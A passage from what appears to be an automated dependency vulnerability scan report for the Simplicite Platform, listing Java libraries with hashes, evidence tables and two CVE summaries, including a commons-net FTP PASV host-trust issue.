Rory Winston Medium Vendor pom developer name Steve Cohen Medium Vendor pom developer org
<a href="http://www.savarese.com/">Savarese Software Research</a>
Medium Vendor pom developer org Hewlett-Packard Medium Vendor pom developer org javactivity.org Medium Vendor pom developer org Quad/Graphics, Inc. Medium Vendor pom groupid commons-net Highest Vendor pom name Apache Commons Net High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-net/ Highest Product file name commons-net High Product jar package name apache Highest Product jar package name commons Highest Product jar package name echo Highest Product jar package name finger Highest Product jar package name ftp Highest Product jar package name net Highest Product jar package name nntp Highest Product jar package name pop3 Highest Product jar package name smtp Highest Product jar package name telnet Highest Product jar package name whois Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-net/ Low Product Manifest Bundle-Name Apache Commons Net Medium Product Manifest bundle-symbolicname org.apache.commons.net Medium Product Manifest implementation-build tags/NET_3_6_RC1@r1782607; 2017-02-11 15:16:26+0000 Low Product Manifest Implementation-Title Apache Commons Net High Product Manifest implementation-url http://commons.apache.org/proper/commons-net/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons Net Medium Product pom artifactid commons-net Highest Product pom developer email bruno.davanzo@hp.com Low Product pom developer email dfs@apache.org Low Product pom developer email Jeff.Brekke@qg.com Low Product pom developer email rwinston@apache.org Low Product pom developer email rwinston@checkfree.com Low Product pom developer email scohen@apache.org Low Product pom developer id brekke Low Product pom developer id brudav Low Product pom developer id dfs Low Product pom developer id rwinston Low Product pom developer id scohen Low Product pom developer name Bruno D'Avanzo Low Product pom developer name Daniel F. Savarese Low Product pom developer name Jeffrey D. Brekke Low Product pom developer name Rory Winston Low Product pom developer name Steve Cohen Low Product pom developer org
<a href="http://www.savarese.com/">Savarese Software Research</a>
Low Product pom developer org Hewlett-Packard Low Product pom developer org javactivity.org Low Product pom developer org Quad/Graphics, Inc. Low Product pom groupid commons-net Highest Product pom name Apache Commons Net High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-net/ Medium Version file version 3.6 High Version Manifest Implementation-Version 3.6 High Version pom parent-version 3.6 Low Version pom version 3.6 Highest
CVE-2021-37533 suppress
Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions:
commons-pool2-2.7.0.jarDescription:
The Apache Commons Object Pooling Library. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-pool2/2.7.0/commons-pool2-2.7.0.jar
MD5: f4c036f0baf058b3320b35c0b04a7a29
SHA1: 7f9ccfaaf76b0ba8b4200480971a170364a9c361
SHA256: 6b54c675c7387e157d28c7098873f2e772c223c7a35bc9b13717367c9753a1e4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-pool2 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name pool2 Highest Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-pool/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-pool2 Medium Vendor Manifest implementation-build release@rf4455dcb8afaf9ae7054589110f1082a7a8a282c; 2019-07-25 14:36:11+0000 Low Vendor Manifest implementation-url https://commons.apache.org/proper/commons-pool/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-pool2 Highest Vendor pom artifactid commons-pool2 Low Vendor pom developer id craigmcc Medium Vendor pom developer id dirkv Medium Vendor pom developer id dweinr1 Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id mattsicker Medium Vendor pom developer id morgand Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sandymac Medium Vendor pom developer id simonetripodi Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name David Weinrich Medium Vendor pom developer name Dirk Verbeeck Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Geir Magnusson Medium Vendor pom developer name Matt Sicker Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Sandy McArthur Medium Vendor pom developer name Simone Tripodi Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Pool High Vendor pom parent-artifactid commons-parent Low Vendor pom url https://commons.apache.org/proper/commons-pool/ Highest Product file name commons-pool2 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name pool2 Highest Product Manifest bundle-docurl https://commons.apache.org/proper/commons-pool/ Low Product Manifest Bundle-Name Apache Commons Pool Medium Product Manifest bundle-symbolicname org.apache.commons.commons-pool2 Medium Product Manifest implementation-build release@rf4455dcb8afaf9ae7054589110f1082a7a8a282c; 2019-07-25 14:36:11+0000 Low Product Manifest Implementation-Title Apache Commons Pool High Product Manifest implementation-url https://commons.apache.org/proper/commons-pool/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons Pool Medium Product pom artifactid commons-pool2 Highest Product pom developer id craigmcc Low Product pom developer id dirkv Low Product pom developer id dweinr1 Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id mattsicker Low Product pom developer id morgand Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id sandymac Low Product pom developer id simonetripodi Low Product pom developer name Craig McClanahan Low Product pom developer name David Weinrich Low Product pom developer name Dirk Verbeeck Low Product pom developer name Gary Gregory Low Product pom developer name Geir Magnusson Low Product pom developer name Matt Sicker Low Product pom developer name Morgan Delagrange Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Sandy McArthur Low Product pom developer name Simone Tripodi Low Product pom developer org The Apache Software Foundation Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Pool High Product pom parent-artifactid commons-parent Medium Product pom url https://commons.apache.org/proper/commons-pool/ Medium Version file version 2.7.0 High Version Manifest Bundle-Version 2.7.0 High Version Manifest Implementation-Version 2.7.0 High Version pom parent-version 2.7.0 Low Version pom version 2.7.0 Highest
commons-vfs2-2.4.1.jarDescription:
Apache Commons VFS is a Virtual File System library. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-vfs2/2.4.1/commons-vfs2-2.4.1.jar
MD5: 3689ad3e33c2455c033c7062f583c49f
SHA1: 2b041628c3cb436d8eee25f78603f04eb5e817a5
SHA256: 1d518e883bb4e9a791c2bb48c76ed7b8879708b312ed955854e50b831e23ed35
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-vfs2 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name vfs Highest Vendor jar package name vfs2 Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-vfs/ Low Vendor Manifest bundle-symbolicname org.apache.commons.vfs2 Medium Vendor Manifest implementation-build release@reabdee306d5b0a73859a0aa841a5c0ccfe8b337a; 2019-08-11 00:23:00+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-vfs/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-vfs2 Highest Vendor pom artifactid commons-vfs2 Low Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons VFS High Vendor pom parent-artifactid commons-vfs2-project Low Vendor pom url http://commons.apache.org/proper/commons-vfs/ Highest Product file name commons-vfs2 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name filter Highest Product jar package name vfs Highest Product jar package name vfs2 Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-vfs/ Low Product Manifest Bundle-Name Apache Commons VFS Medium Product Manifest bundle-symbolicname org.apache.commons.vfs2 Medium Product Manifest implementation-build release@reabdee306d5b0a73859a0aa841a5c0ccfe8b337a; 2019-08-11 00:23:00+0000 Low Product Manifest Implementation-Title Apache Commons VFS High Product Manifest implementation-url http://commons.apache.org/proper/commons-vfs/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons VFS Medium Product pom artifactid commons-vfs2 Highest Product pom groupid org.apache.commons Highest Product pom name Apache Commons VFS High Product pom parent-artifactid commons-vfs2-project Medium Product pom url http://commons.apache.org/proper/commons-vfs/ Medium Version file version 2.4.1 High Version Manifest Bundle-Version 2.4.1 High Version Manifest Implementation-Version 2.4.1 High Version pom version 2.4.1 Highest
core-3.0.1.jarDescription:
Core barcode encoding/decoding library File Path: /var/simplicite/.m2/repository/com/google/zxing/core/3.0.1/core-3.0.1.jarMD5: 0a0184c3f92492f721d8631d6f5237deSHA1: 9ebf6cd580d67601fbf88fd007aab4703b19e4c2SHA256: 38c49045765281e4c170062fa3f48e4e988629bf985cab850c7497be5eaa72a1Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name core High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name zxing Highest Vendor jar package name zxing Low Vendor pom artifactid core Highest Vendor pom artifactid core Low Vendor pom groupid com.google.zxing Highest Vendor pom name ZXing Core High Vendor pom parent-artifactid zxing-parent Low Product file name core High Product jar package name google Highest Product jar package name zxing Highest Product jar package name zxing Low Product pom artifactid core Highest Product pom groupid com.google.zxing Highest Product pom name ZXing Core High Product pom parent-artifactid zxing-parent Medium Version file version 3.0.1 High Version pom version 3.0.1 Highest
curvesapi-1.06.jarDescription:
Implementation of various mathematical curves that define themselves over a set of control points. The API is written in Java. The curves supported are: Bezier, B-Spline, Cardinal Spline, Catmull-Rom Spline, Lagrange, Natural Cubic Spline, and NURBS. License:
BSD License: http://opensource.org/licenses/BSD-3-Clause File Path: /var/simplicite/.m2/repository/com/github/virtuald/curvesapi/1.06/curvesapi-1.06.jar
MD5: 049221bdb7f8d8a2065c02000e854ed4
SHA1: 159dd2e8956459a4eb0a9a6ecda9004d8d289708
SHA256: 38bb45c99e6153260c19b97b99b6a7370a067de63344de6d1ea11922acaed86b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name curvesapi High Vendor jar package name graphbuilder Low Vendor jar package name math Low Vendor pom artifactid curvesapi Highest Vendor pom artifactid curvesapi Low Vendor pom developer id stormdollar Medium Vendor pom developer id virtuald Medium Vendor pom developer name Dustin Spicuzza Medium Vendor pom developer name stormdollar Medium Vendor pom groupid com.github.virtuald Highest Vendor pom name curvesapi High Vendor pom url virtuald/curvesapi Highest Product file name curvesapi High Product jar package name math Low Product pom artifactid curvesapi Highest Product pom developer id stormdollar Low Product pom developer id virtuald Low Product pom developer name Dustin Spicuzza Low Product pom developer name stormdollar Low Product pom groupid com.github.virtuald Highest Product pom name curvesapi High Product pom url virtuald/curvesapi High Version file version 1.06 High Version pom version 1.06 Highest
dec-0.1.2.jarDescription:
Brotli is a generic-purpose lossless compression algorithm. License:
http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/org/brotli/dec/0.1.2/dec-0.1.2.jar
MD5: 4b1cd14cf29733941cc536b27e6aedfa
SHA1: 0c26a897ae0d524809eef1c786cc6183b4ddcc3b
SHA256: 615c0c3efef990d77831104475fba6a1f7971388691d4bad1471ad84101f6d52
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name dec High Vendor jar package name brotli Highest Vendor jar package name dec Highest Vendor Manifest bundle-docurl http://brotli.org/dec Low Vendor Manifest bundle-symbolicname org.brotli.dec Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor pom artifactid dec Highest Vendor pom artifactid dec Low Vendor pom groupid org.brotli Highest Vendor pom parent-artifactid parent Low Product file name dec High Product jar package name brotli Highest Product jar package name dec Highest Product Manifest bundle-docurl http://brotli.org/dec Low Product Manifest Bundle-Name org.brotli:dec Medium Product Manifest bundle-symbolicname org.brotli.dec Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product pom artifactid dec Highest Product pom groupid org.brotli Highest Product pom parent-artifactid parent Medium Version file version 0.1.2 High Version Manifest Bundle-Version 0.1.2 High Version pom version 0.1.2 Highest
diffutils-1.3.0.jarDescription:
The DiffUtils library for computing diffs, applying patches, generationg side-by-side view in Java. License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/java-diff-utils/diffutils/1.3.0/diffutils-1.3.0.jar
MD5: 638158a6bca62926aa9986c92ccb15e0
SHA1: 7e060dd5b19431e6d198e91ff670644372f60fbd
SHA256: 61ba4dc49adca95243beaa0569adc2a23aedb5292ae78aa01186fa782ebdc5c2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name diffutils High Vendor jar package name diffutils Highest Vendor Manifest bundle-symbolicname com.googlecode.java-diff-utils.diffutils Medium Vendor pom artifactid diffutils Highest Vendor pom artifactid diffutils Low Vendor pom groupid com.googlecode.java-diff-utils Highest Vendor pom name java-diff-utils High Vendor pom url http://code.google.com/p/java-diff-utils/ Highest Product file name diffutils High Product jar package name diffutils Highest Product Manifest Bundle-Name java-diff-utils Medium Product Manifest bundle-symbolicname com.googlecode.java-diff-utils.diffutils Medium Product pom artifactid diffutils Highest Product pom groupid com.googlecode.java-diff-utils Highest Product pom name java-diff-utils High Product pom url http://code.google.com/p/java-diff-utils/ Medium Version file version 1.3.0 High Version Manifest Bundle-Version 1.3.0 High Version pom version 1.3.0 Highest
CVE-2021-4277 suppress
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability. CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions:
docusign-esign-java-3.2.0.jarDescription:
The official DocuSign eSignature JAVA client is based on version 2 of the DocuSign REST API and provides libraries for JAVA application integration. It is recommended that you use this version of the library for new development. License:
DocuSign Java Client License: https://raw.githubusercontent.com/docusign/docusign-java-client/master/LICENSE File Path: /var/simplicite/.m2/repository/com/docusign/docusign-esign-java/3.2.0/docusign-esign-java-3.2.0.jar
MD5: b8145b4608f4320fd468328a51e8fd1d
SHA1: 24d1d0e4eed2a62ee8df1b8cb1f59b113916aaaa
SHA256: 5b63c9bd8b6054a909d38ca0fff961f19481edb980a8721fd8a835c6a4b2bd0f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docusign-esign-java High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name docusign Highest Vendor jar package name docusign Low Vendor jar package name esign Highest Vendor jar package name esign Low Vendor pom artifactid docusign-esign-java Highest Vendor pom artifactid docusign-esign-java Low Vendor pom developer email devcenter@docusign.com Low Vendor pom developer name DocuSign Developer Center Medium Vendor pom developer org DocuSign Medium Vendor pom developer org URL https://www.docusign.com/developer-center Medium Vendor pom groupid com.docusign Highest Vendor pom name docusign-esign-java High Vendor pom url https://www.docusign.com/developer-center Highest Product file name docusign-esign-java High Product jar package name api Highest Product jar package name client Highest Product jar package name docusign Highest Product jar package name esign Highest Product jar package name esign Low Product pom artifactid docusign-esign-java Highest Product pom developer email devcenter@docusign.com Low Product pom developer name DocuSign Developer Center Low Product pom developer org DocuSign Low Product pom developer org URL https://www.docusign.com/developer-center Low Product pom groupid com.docusign Highest Product pom name docusign-esign-java High Product pom url https://www.docusign.com/developer-center Medium Version file version 3.2.0 High Version pom version 3.2.0 Highest
docx4j-ImportXHTML-8.0.0.jarDescription:
docx4j-ImportXHTML converts XHTML to OpenXML WordML (docx) using docx4j
License:
LGPL v2.1: http://www.gnu.org/licenses/lgpl-2.1.html File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-ImportXHTML/8.0.0/docx4j-ImportXHTML-8.0.0.jar
MD5: 24d6600cd4f8f594d64de4ed925bd417
SHA1: f90d3d0f0f1d4463a1172b1cb26f8cb02b16da09
SHA256: d89550699321099bc98c45b58abf608a03fba557668eaba1e3301cdb98e678f4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-ImportXHTML High Vendor jar package name convert Low Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name in Low Vendor pom artifactid docx4j-ImportXHTML Highest Vendor pom artifactid docx4j-ImportXHTML Low Vendor pom developer email jharrop@plutext.com Low Vendor pom developer id jharrop Medium Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-ImportXHTML High Vendor pom url http://www.docx4java.org/ Highest Product file name docx4j-ImportXHTML High Product jar package name convert Low Product jar package name docx4j Highest Product jar package name in Low Product jar package name xhtml Low Product pom artifactid docx4j-ImportXHTML Highest Product pom developer email jharrop@plutext.com Low Product pom developer id jharrop Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom groupid org.docx4j Highest Product pom name docx4j-ImportXHTML High Product pom url http://www.docx4java.org/ Medium Version file version 8.0.0 High Version pom version 8.0.0 Highest
docx4j-JAXB-ReferenceImpl-11.1.3.jarDescription:
config specifying that docx4j should use the JAXB reference impls License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-JAXB-ReferenceImpl/11.1.3/docx4j-JAXB-ReferenceImpl-11.1.3.jar
MD5: a16f24da44058c0420d291880212c4f2
SHA1: 809c0a0f30c2ed15749c423f331ec6e439a37c81
SHA256: 5174a6f8547e4a222f0ec25b2afc5bbe9b89c40ee19029a47072271d0d7ebb3c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-JAXB-ReferenceImpl High Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name jaxb Highest Vendor jar package name jaxb Low Vendor jar package name ri Low Vendor pom artifactid docx4j-JAXB-ReferenceImpl Highest Vendor pom artifactid docx4j-JAXB-ReferenceImpl Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-JAXB-ReferenceImpl High Vendor pom url http://www.docx4java.org/docx4j-JAXB-ReferenceImpl/ Highest Product file name docx4j-JAXB-ReferenceImpl High Product jar package name docx4j Highest Product jar package name jaxb Highest Product jar package name jaxb Low Product jar package name ri Low Product pom artifactid docx4j-JAXB-ReferenceImpl Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-JAXB-ReferenceImpl High Product pom url http://www.docx4java.org/docx4j-JAXB-ReferenceImpl/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-core-11.1.3.jarDescription:
docx4j is a library which helps you to work with the Office Open
XML file format as used in docx
documents, pptx presentations, and xlsx spreadsheets. License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-core/11.1.3/docx4j-core-11.1.3.jar
MD5: ca67b72739567c19dc2220ac01aa25a0
SHA1: a27d3aa8d7b640555e8732a8ae64fc2fb47ed6fc
SHA256: 7f3b9fd839047857ccee8658fd4d3452aa7b211befa137659113c158283c0d6f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-core High Vendor jar package name and Highest Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name format Highest Vendor jar package name in Highest Vendor jar package name org Highest Vendor jar package name xml Highest Vendor pom artifactid docx4j-core Highest Vendor pom artifactid docx4j-core Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-core High Vendor pom url http://www.docx4java.org/docx4j-core/ Highest Product file name docx4j-core High Product jar package name and Highest Product jar package name docx4j Highest Product jar package name format Highest Product jar package name in Highest Product jar package name org Highest Product jar package name xml Highest Product pom artifactid docx4j-core Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-core High Product pom url http://www.docx4java.org/docx4j-core/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-11.1.3.jarDescription:
Our JAXB representation of OpenXML, except for pml and sml (handled separately) License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects/11.1.3/docx4j-openxml-objects-11.1.3.jar
MD5: 62d7c2c9f18e0c0490f3b5a5c0791afd
SHA1: 8ce54d63a0c4fc2abf728bc84d61ec0ff53e9ff9
SHA256: 6e1fa1de6dfc3c21cab674df0e4fb8d7c00ce8046d2e62dd809c234f46e243c5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects High Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor pom artifactid docx4j-openxml-objects Highest Vendor pom artifactid docx4j-openxml-objects Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects/ Highest Product file name docx4j-openxml-objects High Product jar package name docx4j Highest Product jar package name org Highest Product pom artifactid docx4j-openxml-objects Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects High Product pom url http://www.docx4java.org/docx4j-openxml-objects/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-pml-11.1.3.jarDescription:
Our JAXB representation of OpenXML Presentation Markup Language (pml) License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects-pml/11.1.3/docx4j-openxml-objects-pml-11.1.3.jar
MD5: 52b5204c0ba4506c5e49f352e12cf8d4
SHA1: e0b2b913589e628a9fcc2807d82a189a828fb64d
SHA256: 0fcc05e5faba64dcd9a176effdf64aea3679900a6dcec9ab84649a7038992f3f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects-pml High Vendor jar package name pml Highest Vendor jar package name pml Low Vendor jar package name pptx4j Low Vendor pom artifactid docx4j-openxml-objects-pml Highest Vendor pom artifactid docx4j-openxml-objects-pml Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects-pml High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects-pml/ Highest Product file name docx4j-openxml-objects-pml High Product jar package name pml Highest Product jar package name pml Low Product pom artifactid docx4j-openxml-objects-pml Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects-pml High Product pom url http://www.docx4java.org/docx4j-openxml-objects-pml/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-sml-11.1.3.jarDescription:
Our JAXB representation of OpenXML Spreadsheet Markup Language (sml) License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects-sml/11.1.3/docx4j-openxml-objects-sml-11.1.3.jar
MD5: 3ae8a40a473a961d8fd202b45e0088df
SHA1: a3e09cd4b4f8a16c957f5120bdab2bb2dcf3fbd1
SHA256: 20b73fade3c324698204aad0d6db4d23e771cfbdad80c8b66e1cf877f8c2bea5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects-sml High Vendor jar package name sml Highest Vendor jar package name sml Low Vendor jar package name xlsx4j Low Vendor pom artifactid docx4j-openxml-objects-sml Highest Vendor pom artifactid docx4j-openxml-objects-sml Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects-sml High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects-sml/ Highest Product file name docx4j-openxml-objects-sml High Product jar package name sml Highest Product jar package name sml Low Product pom artifactid docx4j-openxml-objects-sml Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects-sml High Product pom url http://www.docx4java.org/docx4j-openxml-objects-sml/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
dtd-parser-1.4.1.jarDescription:
SAX-like API for parsing XML DTDs. License:
Eclipse Distribution License - v 1.0: http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/xml/dtd-parser/dtd-parser/1.4.1/dtd-parser-1.4.1.jar
MD5: 888996ba7078ccac5d93b19b28605ca7
SHA1: c5957db3100f10d1604141ae1545e59e774da2e6
SHA256: 7d02cf299162ed207df82a02079d1d9ac4569d34146b4c3ddc7f1de8f9711d46
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name dtd-parser High Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.xml.dtd-parser Medium Vendor Manifest implementation-build-id 1.4.1 - 1.4.1-RELEASE-6311975df010749c45208d306443e5384b80a5e4, 2018-12-28T12:17:18+0000 Low Vendor Manifest implementation-url https://github.com/eclipse-ee4j/jaxb-dtd-parser Low Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id com.sun.xml.dtd-parser Medium Vendor pom artifactid dtd-parser Highest Vendor pom artifactid dtd-parser Low Vendor pom developer email Roman.Grigoriadi@oracle.com Low Vendor pom developer id bravehorsie Medium Vendor pom developer name Roman Grigoriadi Medium Vendor pom groupid com.sun.xml.dtd-parser Highest Vendor pom name DTD Parser High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Vendor pom url eclipse-ee4j/jaxb-dtd-parser Highest Product file name dtd-parser High Product jar package name sun Highest Product jar package name xml Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name DTD Parser Medium Product Manifest bundle-symbolicname com.sun.xml.dtd-parser Medium Product Manifest implementation-build-id 1.4.1 - 1.4.1-RELEASE-6311975df010749c45208d306443e5384b80a5e4, 2018-12-28T12:17:18+0000 Low Product Manifest Implementation-Title DTD Parser High Product Manifest implementation-url https://github.com/eclipse-ee4j/jaxb-dtd-parser Low Product pom artifactid dtd-parser Highest Product pom developer email Roman.Grigoriadi@oracle.com Low Product pom developer id bravehorsie Low Product pom developer name Roman Grigoriadi Low Product pom groupid com.sun.xml.dtd-parser Highest Product pom name DTD Parser High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Product pom url eclipse-ee4j/jaxb-dtd-parser High Version file version 1.4.1 High Version Manifest Bundle-Version 1.4.1 High Version Manifest implementation-build-id 1.4.1 Low Version Manifest Implementation-Version 1.4.1 High Version pom parent-version 1.4.1 Low Version pom version 1.4.1 Highest
ehcache-core-2.6.2.jarDescription:
This is the ehcache core module. Pair it with other modules for added functionality. License:
The Apache Software License, Version 2.0: src/assemble/EHCACHE-CORE-LICENSE.txt File Path: /var/simplicite/.m2/repository/net/sf/ehcache/ehcache-core/2.6.2/ehcache-core-2.6.2.jar
MD5: b6abecd2c01070700a9001b33b94b3f4
SHA1: 3baecd92015a9f8fe4cf51c8b5d3a5bddcdd3e86
